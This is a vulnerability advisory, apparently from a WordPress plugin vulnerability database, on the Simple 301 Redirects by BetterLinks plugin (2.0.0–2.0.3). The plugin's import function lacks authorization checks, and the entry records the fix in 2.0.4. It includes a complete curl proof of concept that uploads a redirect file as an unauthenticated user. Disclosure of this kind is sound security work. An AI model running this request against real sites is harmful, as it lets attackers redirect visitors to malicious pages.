WordPress Plugin Vulnerabilities
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Import
Description
The import_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to import a set of site redirects.
Proof of Concept
curl -i -s -k -X $'POST' \
-H $'Host: [URL_HERE]' -H $'Content-Length: 379' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://[URL_HERE]' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKPMqn9qY39X09NY' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Referer: [URL]/wp-admin/options-general.php?page=301options' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
--data-binary $'------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name=\"upload_file\"; filename=\"simple-301-redirects.2021-04-08 (1).json\"\x0d\x0aContent-Type: application/json\x0d\x0a\x0d\x0a{\"/\":\"https:\\/\\/google.com\"}\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0aImport File\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY--\x0d\x0a' \
$'[URL]/wp-admin/admin-post.php?page=301options&import=true' Affects Plugins
Fixed in version 2.0.4
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-05-26 (about 12 months ago)
Added
2021-05-26 (about 12 months ago)
Last Updated
2021-05-27 (about 12 months ago)